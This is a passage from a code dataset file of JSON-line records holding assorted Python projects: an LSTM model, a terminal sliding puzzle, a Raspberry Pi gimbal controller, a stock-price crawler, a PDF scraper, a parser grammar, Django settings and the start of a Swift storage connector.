self.lstm = nn.LSTM(embedding_dim, hidden_dim//2, bidirectional=True)\n self.hidden2label = nn.Linear(hidden_dim, label_size)\n self.dropout = nn.Dropout(0.5)\n\n\n def last_timestep(self, unpacked, lengths):\n # Index of the last output for each sequence.\n idx = (lengths - 1).view(-1, 1).expand(unpacked.size(0),\n unpacked.size(2)).unsqueeze(1)\n if torch.cuda.is_available():\n idx = idx.cuda()\n\n return unpacked.gather(1, idx).squeeze()\n\n def init_hidden(self):\n if torch.cuda.is_available():\n h0 = Variable(torch.zeros(2, self.batch_size, self.hidden_dim//2)).cuda()\n c0 = Variable(torch.zeros(2, self.batch_size, self.hidden_dim//2)).cuda()\n else:\n h0 = Variable(torch.zeros(2, self.batch_size, self.hidden_dim//2))\n c0 = Variable(torch.zeros(2, self.batch_size, self.hidden_dim//2))\n return (h0, c0)\n\n def forward(self, sentence,lengths):\n\n packed = torch.nn.utils.rnn.pack_padded_sequence(sentence, lengths,batch_first=True)\n lstm_out, self.hidden = self.lstm(packed, self.hidden)\n unpacked, unpacked_len = torch.nn.utils.rnn.pad_packed_sequence(lstm_out,batch_first=True)\n # get the outputs from the last *non-masked* timestep for each sentence\n last_outputs = self.last_timestep(unpacked, unpacked_len)\n last_outputs = self.dropout(last_outputs)\n #hidden_1 = self.relu1(last_outputs)\n y = self.hidden2label(last_outputs)\n return y\n","sub_path":"gru_pretrained.py","file_name":"gru_pretrained.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"354205823","text":"import random\nimport curses\nimport numpy as np\n\n###### some curses func \ndef display_info(str, x, y,):\n global stdscr\n stdscr.addstr(y,x,str)\n stdscr.refresh()\n\ndef get_ch_and_continue():\n global stdscr\n try:\n stdscr.nodelay(0)\n ch=stdscr.getch()\n stdscr.nodelay(1)\n except:\n exit(2)\n return ch\n\ndef set_win():\n global stdscr\n curses.noecho()\n curses.cbreak()\n stdscr.nodelay(1)\n\ndef unset_win():\n global stdscr\n curses.nocbreak()\n stdscr.keypad(0)\n curses.echo()\n curses.endwin()\n################### over\n\ndef generate_std_list(puzzle=15):\n \n '''\n return [1,2,...15,0]\n '''\n\n std = list(range(1,puzzle+1)) + list(range(1))\n return std\n\n\ndef get_puzzle_shape(puzzle=15):\n '''\n return a number n*n\n '''\n \n return int(np.sqrt(puzzle+1))\n\n\ndef list_to_np(list_puzzle,shape=4):\n '''\n convert a list to array\n '''\n np_puzzle = np.array(list_puzzle)\n \n return np_puzzle.reshape((shape,shape))\n \ndef find_zero_position(np_puzzle,shape=4):\n '''\n get 0 position at array\n '''\n for i in range(shape):\n for j in range(shape):\n if np_puzzle[i,j] == 0:\n return (i,j)\n\ndef game_is_ok(np_puzzle,np_std_puzzle):\n \n is_ok = np_puzzle == np_std_puzzle\n if is_ok.all():\n return True\n else:\n return False\n\ndef move_up(zero_position,shape=4):\n \n if zero_position[0] == shape - 1 :\n return False\n\n else:\n swap_position = (zero_position[0]+1,zero_position[1])\n return swap_position\n\ndef move_down(zero_position,shape=4):\n \n if zero_position[0] == 0:\n return False\n \n else:\n swap_position = (zero_position[0]-1,zero_position[1])\n return swap_position\n\ndef move_left(zero_position,shape=4):\n \n if zero_position[1] == shape - 1:\n return False\n else:\n swap_position = (zero_position[0],zero_position[1]+1)\n return swap_position\n\ndef move_right(zero_position,shape=4):\n\n if zero_position[1] == 0:\n return False\n else:\n swap_position = (zero_position[0],zero_position[1]-1)\n return swap_position\n\ndef gui(np_array):\n \n size = len(np_array)\n length = get_puzzle_shape(puzzle=15)\n\n gui_str = ''\n init_str = '+' + ('-'*length + '+')*size\n gui_str += init_str + '\\n'\n\n for i in np_array:\n for j in i:\n if j == 0:\n j = ' '\n space = length - len(str(j))\n gui_str += '|' + ' '*space + str(j)\n gui_str += '|\\n'\n gui_str += init_str + '\\n'\n return gui_str\n\n\ndef generate_random_array(std_np_puzzle,n=1000,shape=4):\n \n xx_np_puzzle = np.copy(std_np_puzzle)\n s = [move_up,move_left,move_down,move_right]\n for i in range(n):\n move_func = random.choice(s)\n zero_position = find_zero_position(xx_np_puzzle,shape)\n if move_func(zero_position,shape):\n next_position = move_func(zero_position,shape)\n tmp = xx_np_puzzle[zero_position]\n xx_np_puzzle[zero_position] = xx_np_puzzle[next_position]\n xx_np_puzzle[next_position] = tmp\n \n return xx_np_puzzle\n\nif __name__ == '__main__':\n \n stdscr = curses.initscr() ### curses ....\n UP,DOWN,LEFT,RIGHT=65,66,68,67\n banner = '//[q]quit/[r]restart'\n author = '//[A]uthor: Hu/[E]mail:ll104567i@163.com'\n\n puzzle = 15\n shape = get_puzzle_shape(puzzle)\n std_np_puzzle = list_to_np(generate_std_list(puzzle))\n random_np_puzzle = generate_random_array(std_np_puzzle)\n\n while 1:\n try:\n set_win()\n stdscr.clear()\n display_info(banner,0,1)\n display_info(author,0,2)\n display_info(gui(random_np_puzzle),0,3)\n\n '''\n Time mode\n '''\n\n if game_is_ok(std_np_puzzle,random_np_puzzle):\n display_info(banner,0,1)\n display_info(author,0,2)\n display_info(gui(std_np_puzzle),0,3)\n display_info('Niu bi',0,11)\n\n display_info('>>>',0,12)\n c = get_ch_and_continue()\n if c in (ord('q'),ord('Q')):\n exit()\n if c in (ord('r'),ord('R')):\n random_np_puzzle = generate_random_array(std_np_puzzle)\n stdscr.clear()\n display_info(gui(random_np_puzzle),0,0)\n\n if c in (ord('x'),ord('X')):\n random_np_puzzle = np.copy(std_np_puzzle)\n\n if c in (ord('w'),UP):\n zero_position = find_zero_position(random_np_puzzle,shape)\n if move_up(zero_position,shape):\n next_position = move_up(zero_position,shape)\n tmp = random_np_puzzle[zero_position]\n random_np_puzzle[zero_position] = random_np_puzzle[next_position]\n random_np_puzzle[next_position] = tmp\n\n if c in (ord('a'),LEFT):\n zero_position = find_zero_position(random_np_puzzle,shape)\n if move_left(zero_position,shape):\n next_position = move_left(zero_position,shape)\n tmp = random_np_puzzle[zero_position]\n random_np_puzzle[zero_position] = random_np_puzzle[next_position]\n random_np_puzzle[next_position] = tmp\n \n if c in (ord('s'),DOWN):\n zero_position = find_zero_position(random_np_puzzle,shape)\n if move_down(zero_position,shape):\n next_position = move_down(zero_position,shape)\n tmp = random_np_puzzle[zero_position]\n random_np_puzzle[zero_position] = random_np_puzzle[next_position]\n random_np_puzzle[next_position] = tmp\n\n if c in (ord('d'),RIGHT):\n zero_position = find_zero_position(random_np_puzzle,shape)\n if move_right(zero_position,shape):\n next_position = move_right(zero_position,shape)\n tmp = random_np_puzzle[zero_position]\n random_np_puzzle[zero_position] = random_np_puzzle[next_position]\n random_np_puzzle[next_position] = tmp\n else:\n continue\n finally:\n unset_win()\n","sub_path":"puzzle/puzzle.py","file_name":"puzzle.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"352915793","text":"import dashie.core as base\nimport dashie.db.db as dbfunc\n\n\n@base.dashiefunc\nasync def log(message, client):\n params = message.content.split()\n log = dbfunc.Log()\n if len(params) > 1:\n if params[1] == \"Log\" or \"log\":\n post = dbfunc.Log.get(log, params[2])\n await client.send_message(message.channel,\n \"**Post {}:** User: `{}` Channel: `{}` Server: `{}`\\n**Message:** ```{}```\"\n .format(post.id, post.User, post.Channel, post.Server, post.Message))\n return\n\n else:\n return\n","sub_path":"dashie/db/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"54207680","text":"import sys; readl = sys.stdin.readline\n\nn = int(readl())\n\nwords = []\nfor _ in range(n):\n words.append(readl().rstrip())\n\nwords = list(set(words))\n\nwords.sort()\nwords.sort(key= len)\n\nprint(*words, sep= \"\\n\")\n","sub_path":"Python/BOJ/정렬/1181.py","file_name":"1181.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"320255968","text":"import RPi.GPIO as GPIO\nimport time\nimport pigpio\nimport os\n\npi=pigpio.pi()\nif not pi.connected:\n exit()\n\nGPIO.setmode(GPIO.BOARD) #Set Raspberry Pi GPIO to BOARD numbering (as opposed to BCM)\n\nControlPin = {'x':[29,31,33,35],\n\t\t'y':[37,36,38,40]}\n\n#for pin in ControlPin['x']:\n#\tGPIO.setup(pin, GPIO.OUT) #Set each pin to the OUTPUT mode\n#\tGPIO.output(pin,0) #Make sure they start as Off\nfor pin in ControlPin['y']:\n\tGPIO.setup(pin, GPIO.OUT)\n\tGPIO.output(pin,0)\n\n\n#GPIO.setup(7, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n#Keeping this for when I add sensors / limit switches, useless for now\n\nx_lim = float(180) #using type float() so we don't lose degrees over time from rounding\ny_lim = float(180)\n\ndef checklimit(axis): #Returns true or false during go() to signal that the global limits are within/outside their set range\n\tif axis == 'x':\n\t\treturn x_lim >= 360 or x_lim <= 0\n\telse:\n\t\treturn y_lim >= 300 or y_lim <= 60\n\ndef updatelim(dir,axis): #update current angle of global limit vars based on current vector\n\tglobal x_lim\n\tglobal y_lim\n\tif dir == 1: #first number of sequence handed to updatelim is either 1 or 0 (forward or backwards) this determins direciton of vector\n\t\tx = 1\n\tif dir == 0:\n\t\tx = -1\n\tif axis == 'x':\n\t\tx_lim = x_lim + (.703125 * x) #these motors have 512 steps per revolution, each step is .703125 degrees\n\tif axis == 'y':\n\t\ty_lim = y_lim + (.703125 * x)\n\ndef go(seq,steps,speed,axis): #Takes the forward or backwards sequence, number of steps, delay between steps in microseconds, and axis to move the appropriate motors the desired number of steps \n\tglobal x_lim\n\tglobal y_lim\n\tfor i in range(steps): #in a typical keypress, this is 1 \n\t\tupdatelim(seq[1][1],axis) #checks the first number of the current sequence to determine whether this is forward or backwards (see updatelim)\n\t\tif checklimit(axis) == True: #If the axis is outside it's limits, nope nope nope nope.\n\t\t\tbreak \n\t\tfor halfstep in range(8): #the sequences of 1's and 0's later on (f/b sequences) represent the on/off state of each output pin for a given axis. we have to switch this 8 times just to do one step\n\t\t\tfor pin in ControlPin[axis]: #for each one of THOSE 8 sequences, we change the four output pins accordingly\n\t\t\t\tGPIO.output(pin, seq[halfstep][ControlPin[axis].index(pin)])\n\t\t\ttime.sleep(float(speed)/1000) #we're moving a physical metal shaft here, so let's sleep and let it have a bit of time to catch up to what we're outputting, or else the motor will skip steps and not move anywhere.\n\ndef home(axis):\n\tglobal x_lim\n\tglobal y_lim\n\tif axis == 'x': #pretty simple. Monitor x and y axis angles until each is at 180 (striaght up).\n\t\twhile x_lim != 180:\n\t\t\tif x_lim > 180:\n\t\t\t\tgo(b,1,2,axis)\n\t\t\tif x_lim < 180:\n\t\t\t\tgo(f,1,2,axis)\t\n\tif axis == 'y':\n\t\twhile y_lim != 180:\n\t\t\tif y_lim > 180:\n\t\t\t\tgo(b,1,2,axis)\n\t\t\tif y_lim < 180:\n\t\t\t\tgo(f,1,2,axis)\n#---------------------------\nf = [ [1,0,0,0], #each group in this sequence represents the state of four output pins.\n\t[1,1,0,0], #imagine the diagonal shape of 1's as the direction we're pushing magnetic current\n\t[0,1,0,0],\n\t[0,1,1,0],\n\t[0,0,1,0],\n\t[0,0,1,1],\n\t[0,0,0,1],\n\t[1,0,0,1] ]\n\nb = [ [0,0,0,1],\n\t[0,0,1,1],\n\t[0,0,1,0],\n\t[0,1,1,0],\n\t[0,1,0,0],\n\t[1,1,0,0],\n\t[1,0,0,0],\n\t[1,0,0,1] ]\n\n\nkeymap = { 1:[b,1,2,'y'], #Created a dictionary of all key mappings, and direciton/steps/speed/axis for each key.\n\t 2:[f,1,2,'y'], #I've created more keys for a \"two handed layout\" to make moving the gimal in either 1 small step, or one step of 45 degrees.\n\t 3:[b,1,2,'x'],\n\t 4:[f,1,2,'x'],\n\t 5:[b,64,1,'y'],\n\t 6:[f,64,1,'y'],\n\t 7:[b,64,1,'x'],\n\t 8:[f,64,2,'x']}\n\n#go(*keymap[6])\n#home('y)\n\n# mở terminal gõ : sudo systemctl enable pigpiod\n\n\ndef foo():\n foo.counter += 1\nfoo.counter = 0\npre_degree = 0\n\n\ndef cbf(gpio,level,tick):\n global pre_degree\n \n if (level == 0) & (foo.counter == 1):\n cbf.y = tick\n foo.counter = 0\n dc = cbf.y - cbf.x\n #print(dc)\n degree = round((dc - 1100)*120/(750*0.703125))\n\n \n diff = degree - pre_degree\n if diff >=10:\n print(diff)\n go(f,diff,1,'y')\n pre_degree = degree\n if diff <= -10:\n print(diff)\n go(b,abs(diff),1,'y')\n pre_degree = degree\n\n\n\n \n #old_degree = degree\n #if diff >= 0: \n #\tgo(b,diff,1,'y')\n #else:\n #\tgo(f,abs(diff),1,'y')\n\n if level == 1:\n foo()\n if foo.counter == 1:\n cbf.x = tick\n #time.sleep(0.2)\n #endif\n #endif \n#enddef cbf\n#----------------------------\n\n\n\n\n\n\ncb1=pi.callback(17,pigpio.EITHER_EDGE,cbf) \n\n\n \n\t\t\n\n\n\n","sub_path":"UAV_thesis/step_motor_gimbal-1.py","file_name":"step_motor_gimbal-1.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"159379966","text":"import FinanceDataReader as fdr\nfrom database import DB\n\nmarket_symbol_list = ['KOSPI', 'KOSDAQ']\n\nstart_date = '2000-01-01'\nend_date = '2019-08-31'\n\nfor market_symbol in market_symbol_list:\n print(market_symbol)\n listed_stocks = fdr.StockListing(market_symbol)\n code_list = listed_stocks['Symbol'].to_list()\n\n for i, code in enumerate(code_list):\n print(\"{} / {}\".format(i+1, len(code_list)))\n df = fdr.DataReader(code, start_date, end_date)\n df.reset_index(inplace=True)\n df['Date'] = df['Date'].apply(lambda t: t.strftime(\"%Y%m%d\"))\n drop_columns = ['Volume', 'Change']\n df.drop(drop_columns, inplace=True, axis=1)\n # data = df.loc[:, ['Date', 'Open', 'High', 'Low', 'Close', 'Date']].values.tolist()\n data = df.loc[:, ['Date', 'Open', 'High', 'Low', 'Close']].values.tolist()\n\n sql = (\n 'INSERT INTO `adjusted_daily_price` (`code`, `date`, `open`, `high`, `low`, `close`) '\n 'SELECT * FROM (SELECT '\n '\"{code}\" as code, '\n '%s as date, '\n '%s as open, '\n '%s as high, '\n '%s as low, '\n '%s as close '\n ') AS input '\n # 'WHERE NOT EXISTS( '\n # ' SELECT code, date FROM `adjusted_daily_price` WHERE code = \"{code}\" AND date = %s '\n # ')LIMIT 1; '\n ).format(code=code)\n print(sql)\n DB.cursor.executemany(sql, data)\n DB.con.commit()\n\n\n","sub_path":"crawling_daily_price.py","file_name":"crawling_daily_price.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"488000437","text":"import urllib.request\nimport urllib\nimport random\nimport string\nimport sys\nimport pathlib\nfrom bs4 import BeautifulSoup\nimport re\n\nif len(sys.argv) < 2:\n print('ERROR: Downloader requires number of images to be attempted to download as argument, download directory optional')\n quit()\n\nif int(sys.argv[1]) <= 0:\n print('ERROR: Number of PDFs to be attempted to download must be larger than 0')\n quit()\n\nprint('Random PDF File Download started')\n\ndef randomString(stringLength=10):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\ndir = 'download'\n\nif len(sys.argv) == 3:\n dir = str(sys.argv[2])\n\npathlib.Path(dir).mkdir(parents=True, exist_ok=True)\n\nfor x in range(0, int(sys.argv[1])):\n try:\n html_page = urllib.request.urlopen(\"https://dare.uva.nl/search?browse-all=yes;docsPerPage=1;startDoc=\" + str(x))\n soup = BeautifulSoup(html_page, features=\"html.parser\")\n for link in soup.findAll('a'):\n #if link.get('href').startswith('https://pure.uva.nl/ws/files/'):\n if link.get('href').endswith('.pdf'):\n print(link.get('href'))\n urllib.request.urlretrieve(link.get('href'), dir + '/' + randomString(20) + '.pdf')\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n print('ERROR: Encountered exception, dropping request')\n","sub_path":"PDFDownload.py","file_name":"PDFDownload.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"273248586","text":"#!/usr/bin/env pypy\n# coding=utf-8\n# vim: ai ts=4 sts=4 et sw=4 ft=python\n#\n# # Released under MIT License\n#\n# Copyright (c) 2016 Konrad Podlawski.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom rply import ParserGenerator\n\nfrom rpyfox.errors.pg import UnexpectedEnd, ParseError\nfrom rpyfox.ply.ast import *\nfrom rpyfox.ply.lexer import RULES\n\nPRECEDENCE = [\n ('left', ['EQ']),\n ('left', ['FUN']),\n ('left', [',']),\n ('left', ['COMPARISON']),\n ('left', ['PLUS', 'MINUS']),\n ('left', ['APPLICATION']),\n ('left', ['ASTERISK', '/', '%']),\n]\n\nparser_generator = ParserGenerator(RULES,\n precedence=PRECEDENCE,\n cache_id=\"rpyfox\")\n\n\n@parser_generator.production(\"main : statements\")\ndef main_module(state, p):\n state.rule = 'main_module'\n return p[0]\n\n\n@parser_generator.production(\"statements : statement statements\")\ndef statements_multiple(state, p):\n state.rule = 'statements_multiple'\n p[1].prepend_statement(p[0])\n return p[1]\n\n\n@parser_generator.production(\"statements : statement\")\ndef statements_single_expression(state, p):\n state.rule = 'statements_single_expression'\n return Statements(statements=[p[0]],\n sourcepos=p[0].get_sourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"statement : expression PERIOD\")\ndef statement_expression(state, p):\n state.rule = 'statement_expression'\n return p[0]\n\n\n@parser_generator.production(\n \"expression : expression BACKTICK atom BACKTICK expression\")\ndef binop_builtin(state, p):\n state.rule = 'binop_application'\n\n return Application(\n f=Application(f=p[2], param=p[0],\n sourcepos=p[0].get_sourcepos(), filename=state.filename),\n param=p[4],\n sourcepos=p[4].get_sourcepos(),\n filename=state.filename)\n\n\n# region expressions {{\n# Multiplication\n@parser_generator.production(\"expression : expression ASTERISK expression\")\n@parser_generator.production(\"expression : expression / expression\")\n@parser_generator.production(\"expression : expression % expression\")\n@parser_generator.production(\"expression : expression AMPERSAND expression\")\n# Addition\n@parser_generator.production(\"expression : expression PLUS expression\")\n@parser_generator.production(\"expression : expression MINUS expression\")\n# Comparisons\n@parser_generator.production(\"expression : expression > expression\",\n precedence=\"COMPARISON\")\n@parser_generator.production(\"expression : expression < expression\",\n precedence=\"COMPARISON\")\n@parser_generator.production(\"expression : expression >= expression\",\n precedence=\"COMPARISON\")\n@parser_generator.production(\"expression : expression <= expression\",\n precedence=\"COMPARISON\")\n@parser_generator.production(\"expression : expression != expression\",\n precedence=\"COMPARISON\")\n# Accessors\n@parser_generator.production(\"expression : expression DCOLON expression\")\n# Combinators\n@parser_generator.production(\"expression : expression , expression\")\n@parser_generator.production(\"expression : expression ; expression\")\n# Equality, clause, functions\n@parser_generator.production(\"expression : expression EQ expression\")\n@parser_generator.production(\"expression : expression CLAUSE_SYM expression\")\n@parser_generator.production(\"expression : expression FUN expression\")\ndef expression_binop(state, p):\n state.rule = 'expression_binop'\n\n op = Atom(name=p[1].getstr(),\n sourcepos=p[1].getsourcepos(), filename=state.filename)\n\n return Application(\n f=Application(f=op, param=p[0],\n sourcepos=p[0].get_sourcepos(), filename=state.filename),\n param=p[2],\n sourcepos=p[2].get_sourcepos(),\n filename=state.filename)\n\n\n@parser_generator.production(\"expression : LPAREN expression RPAREN\")\ndef expression_parens(state, p):\n state.rule = 'expression_parens'\n return p[1]\n\n\n@parser_generator.production(\"expression : atom\")\ndef expression_single_atom(state, p):\n state.rule = 'expression_single_atom'\n return p[0]\n\n\n@parser_generator.production(\"expression : expression expression\",\n precedence=\"APPLICATION\")\ndef expression_application(state, p):\n state.rule = 'expression_application'\n return Application(f=p[0], param=p[1],\n sourcepos=p[0].get_sourcepos(), filename=state.filename)\n\n\n# }} endregion expressions\n\n# region atoms {{\n@parser_generator.production(\"atom : primitive\")\n@parser_generator.production(\"atom : var\")\ndef atom(state, p):\n state.rule = 'atom'\n return p[0]\n\n\n@parser_generator.production(\"primitive : STRING\")\ndef primitive_string(state, p):\n state.rule = 'primitive_string'\n return String(p[0].getstr().strip(\"\\\"\"),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"primitive : INTEGER\")\ndef primitive_string(state, p):\n state.rule = 'primitive_integer'\n return Integer(int(p[0].getstr()),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"primitive : FLOAT\")\ndef primitive_string(state, p):\n state.rule = 'primitive_float'\n return Float(float(p[0].getstr()),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"atom : GROUND_VAR\")\ndef ground_var(state, p):\n state.rule = 'ground_var'\n return Atom(name=p[0].getstr(),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"var : FREE_VAR\")\ndef free_var(state, p):\n state.rule = 'free_var'\n return Variable(name=p[0].getstr(),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n@parser_generator.production(\"var : DEST_VAR\")\ndef dest_var(state, p):\n state.rule = 'dest_var'\n return DestVariable(name=p[0].getstr(),\n sourcepos=p[0].getsourcepos(), filename=state.filename)\n\n\n# }} endregion atoms\n\n@parser_generator.error\ndef error_handler(self, token):\n is_unexpected_end = token.gettokentype() == \"$end\"\n if is_unexpected_end:\n ex = UnexpectedEnd\n else:\n ex = ParseError\n raise ex(token=token, source=self.source, rule=self.rule)\n","sub_path":"rpyfox/ply/parser/pg.py","file_name":"pg.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"615024468","text":"import os.path\nfrom utils.graph import create_bound_graph\n\n\ndef get_authoritative_ontology(skos_location):\n return create_graph(skos_location)\n\n\ndef create_graph(skos_location):\n g = create_bound_graph()\n\n # The ontology file is in the same folder as this file, called 'otd.ttl'.\n # That file is the canonical description of the ontology.\n otd_ontology = os.path.join(\n os.path.dirname(__file__),\n 'otd.ttl'\n )\n\n g.parse(location=otd_ontology, format='turtle')\n\n if skos_location:\n g.parse(location=skos_location)\n\n return g\n","sub_path":"ontology/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"287992766","text":"import os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nSECRET_KEY = 'r269$heh9at2cot+5l$*$4&xzwsfbbg0&&^prr+e&oh)_4-+ga'\nDEBUG = True\nTEMPLATE_DEBUG = True\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_ROOT = os.path.join(BASE_DIR, \".static\")\nSTATIC_URL = '/static/'\nALLOWED_HOSTS = [\n 'localhost',\n '127.0.0.1',\n]\nROOT_URLCONF = '{{ project_name }}.urls'\nWSGI_APPLICATION = '{{ project_name }}.wsgi.application'\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.humanize',\n 'storages',\n 'bakery',\n 'calaccess_raw',\n 'calaccess_campaign_browser',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': os.environ.get('MYSQL_DATABASE', 'calaccess'),\n 'USER': os.environ.get('MYSQL_USER', 'ccdc'),\n 'PASSWORD': os.environ.get('MYSQL_PASSWORD', 'ccdc'),\n 'HOST': os.environ.get('MYSQL_HOST', 'localhost'),\n 'PORT': os.environ.get('MYSQL_PORT', '3306'),\n 'OPTIONS': {\n 'local_infile': 1,\n }\n }\n}\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_URL = '/static/'\n","sub_path":"project_name/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"597628107","text":"#!/usr/bin/python\n\n# (C) Copyright 2017 IBM Corp.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nThis file implements SwiftHLM Dummy Backend Connector, a reference\nimplementation reusable for implementing a SwiftHLM Backend Connector for your\nown HLM storage backend, which is considered backend-specific and external for\nSwiftHLM. Any SwiftHLM Backend Connector implementation must implement\nSwiftHlmBackendConnector class and its public method for SwiftHLM Generic\nBackend API used between SwiftHLM and SwiftHLM Connector.\n\n*** SwiftHLM Generic Backend API version 0.2.1 ***\n(3 digits API versions, such version as 0.2.1, should be considered\ndevelopmental and not stable)\n\n response = SwiftHlmBackendConnector.submit_request_get_response(request)\n\nrequest =\n {\n command : status, \n objects : \n [\n { object : /a/c/obj1, file : /srv/node/filepath1 },\n { object : /a/c/obj2, file : /srv/node/filepath2 }\n ]\n }\n\nresponse = \n {\n objects : \n [\n {object : /a/c/obj1, file : /srv/node/filepath1, status : migrated,},\n {object : /a/c/obj2, file : /srv/node/filepath2, status : resident},\n {object : /a/c/obj3, file : /srv/node/filepath3, status : premigrated}, \n {object : /a/c/obj4, file : /srv/node/filepath4, status : unknown}\n ]\n }\n\nThe deta structures used are dicitionary and list, the values are strings,\nshown above unquoted and additinally indented for easier reading.\n\nIn addition to 'status', other requests are 'migrate' or 'recall' for which the\nresponse is integer:\n 0 - success\n 1 - 1 or more objects could not be migrated/recalled\n 2 - unable to process request for all objects (e.g. cannot invoke backend)\n\nInternal methods of SwiftHlmBackendConnector are backend specific, and\ntypically involve reformatting the list of object and files to be migrated,\nsubmitting the list and the operation to backend, and receiving response from\nbackend. Typically it is the backend that moves data between LLM (low latency media)\nand HLM (hight latency media) and changes or reports replica state. For other\ntypes of HLM backend the data move and state management function may be\nimplemented in the SwiftHLM Backend Connector of that backend. \n\nAuthors:\nSlavisa Sarafijanovic (sla@zurich.ibm.com)\n\n\"\"\"\n\nfrom sys import stdin, stdout \nfrom collections import defaultdict\n#from swift.common import read_config_file\nimport ConfigParser\nfrom swift.common.utils import readconf\nfrom swift.common.utils import json, get_logger, split_path\nimport logging\n\nfrom swift.obj.server import ObjectController\nfrom swift.common.storage_policy import POLICIES\nfrom swift.common.exceptions import ConnectionTimeout, DiskFileQuarantined, \\\n DiskFileNotExist, DiskFileCollision, DiskFileNoSpace, DiskFileDeleted, \\\n DiskFileDeviceUnavailable, DiskFileExpired, ChunkReadTimeout, \\\n DiskFileXattrNotSupported\nfrom swift.common.swob import HTTPAccepted, HTTPBadRequest, HTTPCreated, \\\n HTTPInternalServerError, HTTPNoContent, HTTPNotFound, \\\n HTTPPreconditionFailed, HTTPRequestTimeout, HTTPUnprocessableEntity, \\\n HTTPClientDisconnect, HTTPMethodNotAllowed, Request, Response, \\\n HTTPInsufficientStorage, HTTPForbidden, HTTPException, HeaderKeyDict, \\\n HTTPConflict, HTTPServerError\nimport os\n\n#scor aux\nfrom swift.proxy.controllers.base import get_container_info\n\n#scor aux\nfrom swift.common.utils import hash_path\n\n\n# SwiftHLM Backend Connector\nclass SwiftHlmBackendConnector(object):\n\n def __init__(self):\n self.__request_in = {}\n self.__request_out = {}\n self.__response_in = {}\n self.__response_out = {}\n\n # Config\n configFile = r'/etc/swift/object-server.conf'\n self.conf = readconf(configFile) \n\n # Logging\n hlm_stor_node_config = self.conf.get('hlm', None)\n if hlm_stor_node_config:\n hlm_stor_node_log_level = hlm_stor_node_config.get('set log_level',\n None)\n if hlm_stor_node_log_level:\n self.conf['log_level'] = hlm_stor_node_log_level\n self.logger = get_logger(self.conf, 